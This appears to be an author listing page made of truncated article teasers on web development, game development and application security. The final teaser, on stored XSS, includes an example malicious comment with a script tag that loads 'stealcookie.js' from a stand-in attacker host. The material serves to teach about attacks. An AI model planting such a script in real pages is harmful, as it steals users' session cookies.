In this article, I’ll discuss my recent web development using Django. If you’re new to this website, let me give you a short brief.

The HackbotOne platform is a blogging website. The idea behind this platform is to publish content on Application Security & Software Development (application development, security tools, bug bounty write-ups, open-source projects and many more) that can be helpful for those who have an interest and passion in these areas.

For the past couple of months, I did a few reviews of the old HackbotOne website, which I built using the MERN stack a few years ago. And…


What is HTTP Request Smuggling?

HTTP Request Smuggling is a critical, high-severity vulnerability. It was initially discovered by Watchfire back in 2005 and was later rediscovered by James Kettle (albinowax) in August 2019, who presented his research at DEF CON 27 & Black Hat USA. An HRS vulnerability allows an attacker to smuggle an ambiguous HTTP request as a second request inside one single HTTP request, in order to bypass the security controls of a website, gain access to unauthorized sensitive data and perform malicious activities. …


Why is a portfolio site essential for a software developer?

A portfolio site is essential for every software developer to showcase projects and technical skills, demonstrating what you can do based upon your resume. Your portfolio will be very helpful in the job search because the employer is able to see your work, and it will be easier for them to evaluate it for a suitable job. Nowadays it is quite essential for every software developer to maintain a web presence, such as an official GitHub, a Twitter account & a website, so that you can reach out to developer communities and build a…


Introduction

Forest Assassin is a 2D adventure platformer game with easy controls and fun gameplay, which helps everyone get started. It is a classic platformer game with wonderfully designed characters and world. To complete the game, collect all the coins and the trophy; try to collect all 100 gold coins to become the highest scorer in this adventure platformer game. On your way you will face many obstacles and enemies, and you use your sword to fight the enemy.

How to play the game on a desktop browser?

To make it easier for the user I have also…


Coronavirus (COVID-19) — Full Stack Application

What is Coronavirus (COVID-19)?

Coronavirus (COVID-19) is an infectious disease marked by respiratory illness and symptoms like flu, cough, fever and difficulty breathing. On December 31, 2019, the first case was recorded in Wuhan, China. The virus later spread around the world, and as of now around 1 million+ confirmed cases have been recorded.

You can protect yourself from this virus by following basic precautions like washing your hands frequently, avoiding touching your face and maintaining a distance of 1 meter (or 3 feet) between people, and most importantly, if you are sick then immediately call for…


Information gathering is the most important stage of every penetration test, because it gives you a better understanding of your target for exploiting vulnerabilities, along with information such as IP addresses, subdomains, open ports, etc. To gather this information you need proper reconnaissance tools. Many recon tools are available on GitHub, and among them I found the top 10 recon tools which you can use to gather all of this information about your target.

This article is actually published at https://hackbotone.com/blog/10-recon-tools-for-bug-bounty

Important Note

Always remember: before scanning your target you should have proper authorization, otherwise you should…


Introduction

The HackbotOne website produces content from various domains such as Web Hacking, Bug Bounty, Application Development & Game Development.

This article is actually published at https://hackbotone.com/blog/hackbotone-full-stack-application

Which type of content can you expect?

Application Development

I will publish content for both web & mobile platforms, for example Android, Node.js, MongoDB, Go, Reactjs, React-Native and many more related to application development. I’ll try to cover those topics with step-by-step explanations, and in this section I’ll mostly cover programming.

Game Development

Mostly you can expect content from the Unity3d game engine platform, and I’ll try to make small video tutorial…


This is a demonstration of a Stored Cross-Site Scripting attack in SQLiteManager & the User-Agent header. For this demo, I’ll be using bWAPP, a buggy web application that we can use to test various vulnerabilities in the web.

bWAPP official link: http://www.itsecgames.com/

How to perform a Stored Cross-Site Scripting attack in SQLiteManager?


This is a demonstration of a Stored Cross-Site Scripting attack in Change Secret and Cookies. For this demo, I’ll be using bWAPP, a buggy web application that we can use to test various vulnerabilities in the web.

bWAPP official link: http://www.itsecgames.com/

How to perform a Stored Cross-Site Scripting attack in Change Secret?


Introduction to Stored XSS

Stored XSS occurs when an attacker browsing a web application finds a vulnerability that allows him to embed an HTML tag into an input box. The embedded tag becomes a permanent item of that page, and the browser then parses this code every time the page is loaded.

For example, on a blogging website an attacker finds a vulnerability in the comment section and embeds this comment.

Attacker’s comment: Nice Blog! A similar type of blog I have also written but with some new content, please visit my site to read more

<script src="http://attacker.com/stealcookie.js">…

Anshuman Pattnaik

Python | Application Security | Web Security | Cybersecurity | Software Development
